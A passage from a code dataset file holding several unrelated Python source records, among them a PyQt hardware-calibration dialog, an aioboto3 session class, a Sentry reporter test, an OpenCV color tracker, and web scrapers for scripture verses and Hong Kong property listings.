self.tmp_date = datetime.now() - timedelta(days=1)\n else:\n self.tmp_date = datetime.strptime(report_date, \"%Y%m%d\")\n self.report_type = report_type\n self.date = self.tmp_date.strftime('%Y%m%d')\n self.hedge_dir = os.path.split(os.getcwd())[0]\n\n def get_date_before(self, date_num):\n \"\"\"获取从当天起,过去date_num天的日期\"\"\"\n return (self.tmp_date - timedelta(days=date_num)).strftime('%Y%m%d')\n\n def get_date_list(self, date_num):\n \"\"\"获取从当天起,过去date_num天的列表\"\"\"\n date_list = []\n for i in range(0, date_num):\n date_i = (self.tmp_date - timedelta(days=i)).strftime('%Y%m%d')\n date_list.append(date_i)\n return date_list\n\n def data2html(self, data_list, template_name):\n html = data2html.data2html(\n self.date,\n data_list,\n os.path.join(self.hedge_dir, 'template'),\n template_name)\n return html\n\n def html2file(self, html):\n fileobject = open(\n os.path.join(self.hedge_dir, 'report', '%s_report.html' % self.report_type), 'w')\n fileobject.write(\"%s\" % html)\n","sub_path":"Hedgehog.py","file_name":"Hedgehog.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"109892021","text":"# -*- coding: utf-8 -*-\n\"\"\"\nbrickv (Brick Viewer)\nCopyright (C) 2011-2012 Olaf Lüke \nCopyright (C) 2012 Bastian Nordmeyer \nCopyright (C) 2012, 2014-2015 Matthias Bolte \n\nadvanced.py: GUI for advanced features\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License\nas published by the Free Software Foundation; either version 2\nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\nGeneral Public License for more details.\n\nYou should have received a copy of the GNU General Public\nLicense along with this program; if not, write to the\nFree Software Foundation, Inc., 59 Temple Place - Suite 330,\nBoston, MA 02111-1307, USA.\n\"\"\"\n\nfrom brickv.ui_advanced import Ui_Advanced\n\nfrom PyQt4.QtCore import Qt, QTimer\nfrom PyQt4.QtGui import QDialog\n\nfrom brickv import infos\n\nNO_BRICK = 'No Brick found'\n\nclass AdvancedWindow(QDialog, Ui_Advanced):\n def __init__(self, parent):\n QDialog.__init__(self, parent)\n\n self.setupUi(self)\n\n self.button_calibrate.setEnabled(False)\n\n self.brick_infos = []\n\n self.parent = parent\n self.button_calibrate.clicked.connect(self.calibrate_clicked)\n self.combo_brick.currentIndexChanged.connect(self.brick_changed)\n self.check_enable_calibration.stateChanged.connect(self.enable_calibration_changed)\n\n infos.get_infos_changed_signal().connect(self.update_bricks)\n\n self.update_bricks()\n\n def update_bricks(self):\n self.brick_infos = []\n self.combo_brick.clear()\n\n for info in infos.get_brick_infos():\n self.brick_infos.append(info)\n self.combo_brick.addItem(info.get_combo_item())\n\n if self.combo_brick.count() == 0:\n self.combo_brick.addItem(NO_BRICK)\n\n self.update_calibration()\n self.update_ui_state()\n\n def calibrate_clicked(self):\n port_names = ['a', 'b', 'c', 'd']\n\n self.parent.ipcon.adc_calibrate(self.current_device(),\n port_names[self.combo_port.currentIndex()])\n\n self.update_calibration()\n\n def current_device(self):\n try:\n return self.brick_infos[self.combo_brick.currentIndex()].plugin.device\n except:\n return None\n\n def update_calibration(self):\n device = self.current_device()\n\n if device is None or self.combo_port.count() == 0:\n self.label_offset.setText('-')\n self.label_gain.setText('-')\n else:\n def slot():\n offset, gain = self.parent.ipcon.get_adc_calibration(device)\n self.label_offset.setText(str(offset))\n self.label_gain.setText(str(gain))\n QTimer.singleShot(0, slot)\n\n def brick_changed(self, index):\n self.combo_port.clear()\n\n if self.combo_brick.currentIndex() < 0 or len(self.brick_infos) == 0:\n self.combo_port.addItems(['A', 'B', 'C', 'D'])\n return\n\n info = self.brick_infos[index]\n\n for key in sorted(info.bricklets.keys()):\n if info.bricklets[key] is None:\n self.combo_port.addItem(key.upper())\n else:\n self.combo_port.addItem('{0}: {1}'.format(key.upper(), info.bricklets[key].get_combo_item()))\n\n self.update_ui_state()\n self.update_calibration()\n\n if self.combo_port.count() == 0:\n self.check_enable_calibration.setChecked(False)\n\n def enable_calibration_changed(self, state):\n self.button_calibrate.setEnabled(state == Qt.Checked)\n\n def update_ui_state(self):\n enabled = len(self.brick_infos) > 0\n\n self.combo_brick.setEnabled(enabled)\n self.check_enable_calibration.setEnabled(enabled and self.combo_port.count() > 0)\n self.button_calibrate.setEnabled(enabled and self.combo_port.count() > 0 and self.check_enable_calibration.isChecked())\n","sub_path":"src/brickv/advanced.py","file_name":"advanced.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"610870242","text":"import argparse\n\nfrom src.layers import LaPool\nfrom src.models.poolers import SimplePooler\nfrom src.spectral_similarity.training import (results_to_file,\n run_experiment)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--name\", type=str, default=\"Grid2d\")\nparser.add_argument(\"--lr\", type=float, default=1e-2)\nparser.add_argument(\"--patience\", type=int, default=50)\nparser.add_argument(\"--tol\", type=float, default=1e-6)\nparser.add_argument(\"--runs\", type=int, default=3)\nargs = parser.parse_args()\n\n\ndef create_model(**kwargs):\n pool = LaPool(shortest_path_reg=False, return_sel=True)\n model = SimplePooler(pool)\n\n return model\n\n\nresults = run_experiment(\n name=args.name,\n method=\"LaPool\",\n create_model=create_model,\n learning_rate=args.lr,\n es_patience=args.patience,\n es_tol=args.tol,\n runs=args.runs,\n)\nresults_to_file(args.name, \"LaPool\", *results)\n","sub_path":"src/spectral_similarity/run_lapool.py","file_name":"run_lapool.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"252765939","text":"\"\"\"setuptools command to prepare FiPy for release\"\"\"\nfrom __future__ import unicode_literals\n\nfrom distutils.core import Command\nimport glob\nimport os\nimport shutil\n\nfrom setuptools.sandbox import run_setup\nfrom future.utils import text_to_native_str\n\nfrom ._nativize import nativize_all\n\n__all__ = [text_to_native_str(\"release\")]\n\n\nclass release(Command):\n \"\"\"Prepare FiPy for release\n\n Generates tarball and excutable Windows installer\"\"\"\n\n description = \"Prepare the FiPy release artifacts\"\n\n # List of option tuples: long name, short name (None if no short\n # name), and help string.\n user_options = [('unix', None, \"create a tarball source distribution\"),\n ('windows', None, \"create an executable installer for MS Windows\"),\n ('all', None, \"create unix and Windows distributions\"),\n ]\n user_options = [nativize_all(u) for u in user_options]\n\n def initialize_options(self):\n self.unix = 0\n self.windows = 0\n self.all = 0\n\n def finalize_options(self):\n if self.all:\n self.unix = 1\n self.windows = 1\n\n def _remove_manifest(self):\n \"\"\"Remove MANIFEST file\n\n probably no longer needed, MANIFEST was ancient history?\"\"\"\n\n try:\n os.remove(\"MANIFEST\")\n except OSError as _:\n pass\n\n def _build_unix_distribution(self):\n \"\"\"Create Unix source distribution\"\"\"\n\n self._remove_manifest()\n shutil.copyfile(\"MANIFEST-UNIX.in\", \"MANIFEST.in\")\n run_setup(\"setup.py\", [\"sdist\"])\n os.remove(\"MANIFEST.in\")\n\n def _build_windows_distribution(self):\n \"\"\"Create Windows source distribution\n\n Contains executable installer and examples\"\"\"\n\n import versioneer\n\n version = versioneer.get_version()\n\n self._remove_manifest()\n run_setup(\"setup.py\", [\"bdist_wininst\"])\n\n self._remove_manifest()\n\n shutil.copyfile(\"MANIFEST-WINDOWS.in\", \"MANIFEST.in\")\n run_setup(\"setup.py\", [text_to_native_str(s) for s in [\"sdist\", \"--dist-dir=dist-windows\", \"--formats=zip\"]])\n shutil.move(\n os.path.join(\"dist-windows\", \"FiPy-{}.zip\".format(version)),\n os.path.join(\"dist\", \"FiPy-{}.win32.zip\".format(version)),\n )\n os.rmdir(\"dist-windows\")\n os.remove(\"MANIFEST.in\")\n\n def run(self):\n if self.unix:\n self._build_unix_distribution()\n if self.windows:\n self._build_windows_distribution()\n","sub_path":"_setup/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"379445830","text":"import unittest\nimport hashlib\nfrom mock import patch\nfrom superlance.compat import StringIO\nfrom superlance.sentryreporter import SentryReporter\n\n\nclass SentryReporterTests(unittest.TestCase):\n\n def test_ignore_event(self):\n reporter = SentryReporter(sentry_dsn=None, stderr_lines=10, stdout_lines=10)\n exit_event_headers = {'eventname': 'PROCESS_STATE_EXITED'}\n fatal_event_headers = {'eventname': 'PROCESS_STATE_FATAL'}\n stop_event_headers = {'eventname': 'PROCESS_STATE_STOPPED'}\n\n # should ignore crash when it's expected\n self.assertTrue(\n reporter.ignore_event(\n headers=exit_event_headers,\n pheaders={'expected': 1},\n event_type='crash'),\n 'expected crash')\n\n # should ignore if event is not exit\n self.assertTrue(\n reporter.ignore_event(\n headers=stop_event_headers,\n pheaders={'expected': 0},\n event_type='crash'),\n 'unexpected stop')\n\n # should not ignore crash when it's not expected\n self.assertFalse(\n reporter.ignore_event(\n headers=exit_event_headers,\n pheaders={'expected': 0},\n event_type='crash'),\n 'unexpected crash')\n\n # should ignore fatal if event is not exit\n self.assertTrue(\n reporter.ignore_event(\n headers=exit_event_headers,\n pheaders={},\n event_type='fatal'),\n 'exit + fatal')\n\n # should not ignore fatal if event is an exit\n self.assertFalse(\n reporter.ignore_event(\n headers=fatal_event_headers,\n pheaders={},\n event_type='fatal'),\n 'fatal error')\n\n def test_get_event_details(self):\n reporter = SentryReporter(sentry_dsn=None, stderr_lines=10, stdout_lines=10)\n reporter.stdin = StringIO()\n reporter.stdout = StringIO()\n\n reporter.stdin.write('ver:3.0 len:69 eventname:PROCESS_STATE_EXITED\\n')\n reporter.stdin.write('processname:proc groupname:grp from_state:RUNNING expected:0 pid:123\\n')\n reporter.stdin.seek(0)\n\n event_details = reporter.get_event_details('crash')\n\n expected_pheaders = {\n 'processname': 'proc',\n 'groupname': 'grp',\n 'from_state': 'RUNNING',\n 'expected': '0',\n 'pid': '123',\n }\n expected_ignore = False\n self.assertEqual(event_details, (expected_pheaders, expected_ignore))\n\n def test_notify_sentry(self):\n reporter = SentryReporter(sentry_dsn=None, stderr_lines=10, stdout_lines=10)\n msg_header = 'boom header'\n stdout = 'out-BOOM!!!'\n stderr = '''\\\n w.buildFinished(name, s, results)\n File \"/usr/local/lib/python2.7/dist-packages/buildbot/status/mail.py\", line 455, in buildFinished\n return self.buildMessage(name, [build], results)\n File \"/usr/local/lib/python2.7/dist-packages/buildbot/status/mail.py\", line 679, in buildMessage\n build=build, results=build.results)\n File \"/usr/local/lib/python2.7/dist-packages/buildbot/status/mail.py\", line 659, in buildMessageDict\n self.master_status)\n File \"/opt/buildbot/master/jobs/__init__.py\", line 425, in custom_mail_message\n details=build_url,\nexceptions.UnicodeEncodeError: 'ascii' codec can't encode character u'\\u2026' in position 127: ordinal not in range(128)'\n'''\n stderr_body = '\\n'.join(stderr.splitlines()[:-1])\n stderr_last_line = stderr.splitlines()[-1]\n\n md5 = hashlib.md5(stderr_body + stdout).hexdigest()\n\n with patch('superlance.sentryreporter.raven') as raven_mock:\n reporter.notify_sentry(msg_header, stderr, stdout, 'crash')\n\n raven_mock.Client().captureMessage.assert_called_with(\n 'Supervisor CRASH: {}'.format(md5),\n data={'logger': 'superlance'},\n extra={\n 'header': msg_header,\n 'stdout': stdout,\n 'stderr': stderr_body,\n 'stderr_last_line': stderr_last_line,\n },\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"superlance/tests/sentryreporter_test.py","file_name":"sentryreporter_test.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"613426525","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis class essentially overrides the boto3 session init, passing in\nan async botocore session\n\"\"\"\n\n\nimport aiobotocore.session\n\nimport boto3.session\nimport boto3.resources.base\nimport boto3.utils\n\nfrom aioboto3.resources import AIOBoto3ResourceFactory\n\n\nclass Session(boto3.session.Session):\n \"\"\"\n A session stores configuration state and allows you to create service\n clients and resources.\n\n :type aws_access_key_id: string\n :param aws_access_key_id: AWS access key ID\n :type aws_secret_access_key: string\n :param aws_secret_access_key: AWS secret access key\n :type aws_session_token: string\n :param aws_session_token: AWS temporary session token\n :type region_name: string\n :param region_name: Default region when creating new connections\n :type botocore_session: botocore.session.Session\n :param botocore_session: Use this Botocore session instead of creating\n a new default one.\n :type profile_name: string\n :param profile_name: The name of a profile to use. If not given, then\n the default profile is used.\n \"\"\"\n def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,\n aws_session_token=None, region_name=None,\n botocore_session=None, profile_name=None, loop=None):\n if botocore_session is not None:\n self._session = botocore_session\n else:\n # Create a new default session\n self._session = aiobotocore.session.get_session(loop=loop)\n\n # Setup custom user-agent string if it isn't already customized\n if self._session.user_agent_name == 'Botocore':\n botocore_info = 'Botocore/{0}'.format(\n self._session.user_agent_version)\n if self._session.user_agent_extra:\n self._session.user_agent_extra += ' ' + botocore_info\n else:\n self._session.user_agent_extra = botocore_info\n self._session.user_agent_name = 'Boto3'\n self._session.user_agent_version = boto3.__version__\n\n if profile_name is not None:\n self._session.set_config_variable('profile', profile_name)\n\n if aws_access_key_id or aws_secret_access_key or aws_session_token:\n self._session.set_credentials(\n aws_access_key_id, aws_secret_access_key, aws_session_token)\n\n if region_name is not None:\n self._session.set_config_variable('region', region_name)\n\n self.resource_factory = AIOBoto3ResourceFactory(\n self._session.get_component('event_emitter'))\n self._setup_loader()\n self._register_default_handlers()\n\n def _register_default_handlers(self):\n\n # S3 customizations\n self._session.register(\n 'creating-client-class.s3',\n boto3.utils.lazy_call(\n 'aioboto3.s3.inject.inject_s3_transfer_methods'))\n self._session.register(\n 'creating-resource-class.s3.Bucket',\n boto3.utils.lazy_call(\n 'boto3.s3.inject.inject_bucket_methods'))\n self._session.register(\n 'creating-resource-class.s3.Object',\n boto3.utils.lazy_call(\n 'boto3.s3.inject.inject_object_methods'))\n self._session.register(\n 'creating-resource-class.s3.ObjectSummary',\n boto3.utils.lazy_call(\n 'boto3.s3.inject.inject_object_summary_methods'))\n\n # DynamoDb customizations\n self._session.register(\n 'creating-resource-class.dynamodb',\n boto3.utils.lazy_call(\n 'boto3.dynamodb.transform.register_high_level_interface'),\n unique_id='high-level-dynamodb')\n self._session.register(\n 'creating-resource-class.dynamodb.Table',\n boto3.utils.lazy_call(\n 'aioboto3.dynamodb.table.register_table_methods'),\n unique_id='high-level-dynamodb-table')\n\n # EC2 Customizations\n self._session.register(\n 'creating-resource-class.ec2.ServiceResource',\n boto3.utils.lazy_call(\n 'boto3.ec2.createtags.inject_create_tags'))\n\n self._session.register(\n 'creating-resource-class.ec2.Instance',\n boto3.utils.lazy_call(\n 'boto3.ec2.deletetags.inject_delete_tags',\n event_emitter=self.events))\n\n def resource(self, *args, **kwargs):\n result = super(Session, self).resource(*args, **kwargs)\n\n return result\n","sub_path":"aioboto3/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":4568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"87502883","text":"import numpy as np\nimport cv2\n\nrgb_lower_orange = np.uint8([[[255, 215, 0]]])\nrgb_higher_orange = np.uint8([[[255, 140, 0]]])\n\nhsv_lower_orange = cv2.cvtColor(rgb_lower_orange , cv2.COLOR_BGR2HSV)\nhsv_higher_orange = cv2.cvtColor(rgb_higher_orange, cv2.COLOR_BGR2HSV)\n\nmy_video = cv2.VideoCapture(0)\n\nwhile(True):\n ret, frame = my_video.read()\n converted_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n mask = cv2.inRange(converted_frame, hsv_lower_orange, hsv_higher_orange)\n\n res = cv2.bitwise_and(frame, frame, mask=mask)\n\n\n cv2.imshow('frame', frame)\n cv2.imshow('mask', mask)\n cv2.imshow('res', res)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nmy_video.release()\ncv2.destroyAllWindows()\n","sub_path":"examples/videos/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"261733097","text":"# coding=utf-8\n\"\"\"\n机器人:通过消息来触发执行指定模块的main方法\n\"\"\"\nimport time\nimport importlib\nimport threading\nfrom common.bus import Bus\nlock = threading.Lock()\ninited = set([])\n\n\ndef main(config):\n global lock\n global inited\n module_name = config['module']\n # id = config.get('id')\n module = importlib.import_module(module_name)\n functions = dir(module)\n if 'init' in functions:\n if '_inited_' not in functions:\n try:\n lock.acquire()\n if module_name not in inited:\n module.init(**config)\n inited.add(module_name)\n finally:\n module._inited_ = True\n lock.release()\n msg_in = config.get('in', None)\n msg_out = config.get('out', None)\n if 'main' not in functions:\n time.sleep(10.0)\n return True\n if not msg_in and not msg_out:\n module.main()\n return False\n if msg_out and isinstance(msg_out, str):\n msg_out = [msg_out]\n while True:\n data = True\n while data:\n val = Bus.recv(msg_in) or None\n if val is not None:\n r = module.main(*val)\n if msg_out and r is not None:\n for o in msg_out:\n Bus.send(o, r)\n else:\n data = False\n","sub_path":"src/workers/hpss_proxy_robot.py","file_name":"hpss_proxy_robot.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"120509089","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom replacements import current_id_replacements, verse_replacements, synonyms_replacements, translation_replacements, purport_replacements\nfrom pathlib import Path\n\n\ndef parser():\n url = f'https://vanisource.org/wiki/SB_1.1.{_index}'\n\n _source = requests.get(url)\n\n soup = BeautifulSoup(_source.content, 'html.parser')\n\n b_tags = soup.find_all(\"b\")\n\n headers = str(b_tags[len(b_tags)-1])\n headers = headers.replace('', '')\n headers = headers.replace('', '')\n headers = list(headers.split('-'))\n \n pointers = []\n for header in headers:\n head = list(list(header.split('>'))[1].split('<'))[0]\n pointers.append(head)\n \n # print(headers)\n # print(pointers)\n\n current_id = str(soup.find(\"h1\", {\"id\": \"firstHeading\"}))\n current_id = current_id_replacements(current_id)\n\n if _index==1:\n navigation = {\"current_id\": current_id, \"previous_id\": None, \"next_id\": pointers[0]}\n else:\n navigation = {\"current_id\": current_id, \"previous_id\": pointers[0], \"next_id\": pointers[1]}\n\n verse = str(soup.find(\"div\", {\"class\":\"verse\"}))\n verse = verse_replacements(verse)\n verse_entry = [{\"roman\": verse, \"isProse\": False}]\n\n synonyms = str(soup.find(\"div\", {\"class\": \"synonyms\"}))\n synonyms = synonyms_replacements(synonyms)\n\n translation = str(soup.find(\"div\", {\"class\":\"translation\"}))\n translation = translation_replacements(translation)\n\n purport = str(soup.find(\"div\", {\"class\": \"purport\"}))\n purport = purport_replacements(purport)\n purport_paras = list(filter(None, list(purport.split('\\n'))))\n purport_entry = [{\"type\": \"regular\", \"text\": para} for para in purport_paras]\n\n\n\n knowledge = {\"page_info\": navigation, \"verse\": verse_entry, \"synonyms\": synonyms, \"translation\": translation, \"purport\": purport_entry}\n\n\n print(knowledge)\n print(type(knowledge))\n\n if Path(f'/home/somit/Projects/web-scraping/SB/1/1/{_index}.json').is_file():\n with open(f'/home/somit/Projects/web-scraping/SB/1/1/{_index}.json', 'w') as json_file:\n print(knowledge, file=json_file)\n else:\n with open(f'/home/somit/Projects/web-scraping/SB/1/1/{_index}.json', 'x') as json_file:\n print(knowledge, file=json_file)\n\nfor _index in range(1,24):\n parser()","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"525141895","text":"\n#@@CALIBRE_COMPAT_CODE_START@@\nimport sys, os\n\n# Explicitly allow importing everything ...\nif os.path.dirname(os.path.dirname(os.path.abspath(__file__))) not in sys.path:\n sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nif os.path.dirname(os.path.abspath(__file__)) not in sys.path:\n sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))\n\n# Bugfix for Calibre < 5:\nif \"calibre\" in sys.modules and sys.version_info[0] == 2:\n from calibre.utils.config import config_dir\n if os.path.join(config_dir, \"plugins\", \"DeDRM.zip\") not in sys.path:\n sys.path.insert(0, os.path.join(config_dir, \"plugins\", \"DeDRM.zip\"))\n\nif \"calibre\" in sys.modules:\n # Explicitly set the package identifier so we are allowed to import stuff ...\n __package__ = \"calibre_plugins.dedrm\"\n\n#@@CALIBRE_COMPAT_CODE_END@@\n","sub_path":"DeDRM_plugin/__calibre_compat_code.py","file_name":"__calibre_compat_code.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"509653355","text":"# Имеется файл с данными по успеваемости абитуриентов. Он представляет из себя \n# набор строк, где в каждой строке записана следующая информация:\n# Фамилия;Оценка_по_математике;Оценка_по_физике;Оценка_по_русскому_языку\n# Поля внутри строки разделены точкой с запятой, оценки — целые числа.\n# Напишите программу, которая считывает файл с подобной структурой и для \n# каждого абитуриента выводит его среднюю оценку по этим трём предметам на \n# отдельной строке, соответствующей этому абитуриенту.\n# Также в конце файла, на отдельной строке, через пробел запишите средние \n# баллы по математике, физике и русскому языку по всем абитуриентам:\n\ndef average_score(a,b,c):\n \"\"\"\n Вычисляем средний балл студента по трем дисциплинам\n \"\"\"\n return (int(a)+int(b)+int(c))/3\nwith open(\"students.txt\", \"r\") as my_file:\n str = my_file.read().splitlines()\n\nmath=physics=rus=0\nfor i in str:\n stud=i.split(';')\n print(average_score(stud[1], stud[2], stud[3]))\n math+=float(stud[1])\n physics+=float(stud[2])\n rus+=float(stud[3])\n\nprint(math/(len(str)), physics/(len(str)), rus/(len(str))) ","sub_path":"progrbasic/students.py","file_name":"students.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225226870","text":"\n# Init Selenium test browser\nimport pandas as pd\nimport time\nfrom selenium import webdriver\nbrowser = webdriver.Chrome('./chromedriver')\nbrowser.get(\"https://en.midland.com.hk/find-property/#list\")\n\n\n\n# Scrap all information of a property given a detail page\ndef scrap_item_page():\n try:\n sell_price = browser.find_element_by_xpath(\"//div[@class='sect-sellrent']//p[@class='sell-color']\").text\n except:\n sell_price = \"\"\n\n try:\n rent_price = browser.find_element_by_xpath(\"//div[@class='sect-sellrent']//p[@class='rent-color']\").text\n except:\n rent_price = \"\"\n \n item_list = browser.find_elements_by_xpath(\"//li[@class='label-group']\")\n \n for item in item_list:\n item_text = item.text\n # saleable area\n if \"Saleable Area\" in item_text:\n net_area = item_text.split(\":\")[1].split(\"sq\")[0].replace(\" \",\"\")\n # gross area\n if \"Gross Area\" in item_text:\n gross_area = item_text.split(\":\")[1].split(\"sq\")[0].replace(\" \",\"\")\n # Efficiency Ratio\n if \"Efficiency Ratio\" in item_text:\n effi_ratio = item_text.split(\":\")[1].replace(\" \",\"\")\n # Layout\n if \"Layout\" in item_text:\n layout = item_text.split(\":\")[1].replace(\" \",\"\")\n # Orientation\n if \"Orientation\" in item_text:\n orit = item_text.split(\":\")[1].replace(\" \",\"\")\n # View\n if \"View\" in item_text:\n view = item_text.split(\":\")[1].replace(\" \",\"\")\n # Description\n if \"Description\" in item_text:\n desc = item_text.split(\":\")[1].replace(\" \",\"\")\n # Update date\n if \"Update Date\" in item_text:\n upd_dt = item_text.split(\":\")[1].replace(\" \",\"\")\n # Address\n if \"Address\" in item_text:\n addr = item_text.split(\":\")[1]\n # Number of Blocks\n if \"No. of Blocks\" in item_text:\n blk_num = item_text.split(\":\")[1].replace(\" \",\"\")\n # Property School Net\n if \"Property School Net\" in item_text:\n school = item_text.split(\":\")[1]\n # Total Flats\n if \"Total Flats\" in item_text:\n ttl_flt = item_text.split(\":\")[1].replace(\" \",\"\")\n # Date of occupation Permit\n if \"Date of Occupation Permit\" in item_text:\n occu_permit_dt = item_text.split(\":\")[1].replace(\" \",\"\")\n # Facilities\n if \"Facilities\" in item_text:\n facilities = item_text.split(\":\")[1].replace(\" \",\"\")\n # Property Value\n if \"Property Value\" in item_text:\n prop_val = item_text.split(\":\")[1].replace(\" \",\"\")\n # Loan Amount\n if \"Loan Amount\" in item_text:\n ln_amt = item_text.split(\":\")[1].replace(\" \",\"\")\n # Interest Rate\n if \"Interest Rate\" in item_text:\n int_rt = item_text.split(\":\")[1].replace(\" \",\"\")\n # Repayment Period\n if \"Repayment Period\" in item_text:\n rpy_prd = item_text.split(\":\")[1].replace(\" \",\"\")\n # Income Requirement\n if \"Income Requirement\" in item_text:\n inc_reqr = item_text.split(\":\")[1].replace(\" \",\"\")\n \n \n # Check if all variable has been assigned , if not, assign as \"\"\n if \"sell_price\" not in locals():\n sell_price = \"\"\n if \"rent_price\" not in locals():\n rent_price = \"\"\n if \"net_area\" not in locals():\n net_area = \"\"\n if \"gross_area\" not in locals():\n gross_area = \"\"\n if \"effi_ratio\" not in locals():\n effi_ratio = \"\"\n if \"layout\" not in locals():\n layout = \"\"\n if \"orit\" not in locals():\n orit = \"\"\n if \"view\" not in locals():\n view = \"\"\n if \"desc\" not in locals():\n desc = \"\"\n if \"addr\" not in locals():\n addr = \"\"\n if \"blk_num\" not in locals():\n blk_num = \"\"\n if \"school\" not in locals():\n school = \"\"\n if \"ttl_flt\" not in locals():\n ttl_flt = \"\"\n if \"occu_permit_dt\" not in locals():\n occu_permit_dt = \"\"\n if \"facilities\" not in locals():\n facilities = \"\"\n if \"prop_val\" not in locals():\n prop_val = \"\"\n if \"ln_amt\" not in locals():\n ln_amt = \"\"\n if \"int_rt\" not in locals():\n int_rt = \"\"\n if \"rpy_prd\" not in locals():\n rpy_prd = \"\"\n if \"inc_reqr\" not in locals():\n inc_reqr = \"\"\n \n \n info_dict = {\"sell_price\":sell_price\n ,\"rent_price\":rent_price\n ,\"net_area\":net_area\n ,\"gross_area\":gross_area\n ,\"effi_ratio\":effi_ratio\n ,\"layout\":layout\n ,\"orit\":orit\n ,\"view\":view\n ,\"desc\":desc\n ,\"upd_dt\":upd_dt\n ,\"addr\":addr\n ,\"blk_num\":blk_num\n ,\"school\":school\n ,\"ttl_flt\":ttl_flt\n ,\"occu_permit_dt\":occu_permit_dt\n ,\"facilities\":facilities\n ,\"prop_val\":prop_val\n ,\"ln_amt\":ln_amt\n ,\"int_rt\":int_rt\n ,\"rpy_prd\":rpy_prd\n ,\"inc_reqr\":inc_reqr\n }\n \n return info_dict\n\n\n\n# Loop through the list, for each page of the list, open the item detail, and scrap, then return to the list\ndef scrap_current_page():\n item_list = browser.find_elements_by_xpath(\"//*[@class='address-detail']\")\n tmp = pd.DataFrame(columns = [\"sell_price\",\n \"rent_price\",\n \"net_area\",\n \"gross_area\",\n \"effi_ratio\",\n \"layout\",\n \"orit\",\n \"view\",\n \"desc\",\n \"upd_dt\",\n \"addr\",\n \"blk_num\",\n \"school\",\n \"ttl_flt\",\n \"occu_permit_dt\",\n \"facilities\",\n \"prop_val\",\n \"ln_amt\",\n \"int_rt\",\n \"rpy_prd\",\n \"inc_reqr\"])\n \n for item in item_list:\n item.click() # Open the item page\n browser.switch_to.window(browser.window_handles[-1]) # Switch to that item tab\n try:\n info = scrap_item_page() # Scrap the item information\n except: # Some item page are broken, close it and switch back\n browser.close()\n browser.switch_to.window(browser.window_handles[0])\n continue\n tmp = tmp.append(pd.DataFrame(info, index=[0]))\n browser.close() # Close the item tab\n browser.switch_to.window(browser.window_handles[0]) # Switch to that item list tab\n return tmp\n\n\n\n# Init the dataset format\nmidland_reality_data = pd.DataFrame(columns = [\"sell_price\",\n \"rent_price\",\n \"net_area\",\n \"gross_area\",\n \"effi_ratio\",\n \"layout\",\n \"orit\",\n \"view\",\n \"desc\",\n \"upd_dt\",\n \"addr\",\n \"blk_num\",\n \"school\",\n \"ttl_flt\",\n \"occu_permit_dt\",\n \"facilities\",\n \"prop_val\",\n \"ln_amt\",\n \"int_rt\",\n \"rpy_prd\",\n \"inc_reqr\"])\n\n\n\n\n# Loop through all the pages, and collect all information\ni=1\nwhile i>0: # Keep looping till break\n print(\"Scraping page\", i, \"......\")\n cur_pg_df = scrap_current_page()\n midland_reality_data = midland_reality_data.append(cur_pg_df)\n try:\n midland_reality_data.to_csv(\"midland_realty_data.csv\", encoding = \"utf-8\")\n print(\"Updated csv file successfully!\")\n except:\n print(\"opps!! Error occured while appending page\", i)\n \n i+=1\n try:\n next_page_button = browser.find_element_by_xpath(\"//*[@id='page-selection']/ul/li[@data-lp='\"+str(i)+\"']/a\")\n next_page_button.click()\n time.sleep(5)\n except:\n print(\"No next page available, Done Scraping!\")\n break\n\n","sub_path":"MidLand_Data_Collection.py","file_name":"MidLand_Data_Collection.py","file_ext":"py","file_size_in_byte":8929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"566343676","text":"from mcpi.minecraft import Minecraft\nimport numpy as np\nfrom random import randint\n\nx0 = 1000\nz0 = 1900\n\n# This is poor form: It treats a as a minecraft position and b as a tuple of 3 coordinates\ndef FracJump(a, b, frac): return (a.x + frac*(b[0]-a.x), a.y + frac*(b[1]-a.y), a.z + frac*(b[2]-a.z))\n\n# Chaos game in 3D is len(v) vertices and frac jumps; we will do nSteps of these\n# mc is minecraft; notice the root position is determined by the player; it is not passed\n# v is a list of triples, vertex relative coordinates in (x, y, z)\n# notice there are n = len(v) such vertices, implicit\n# suppose we 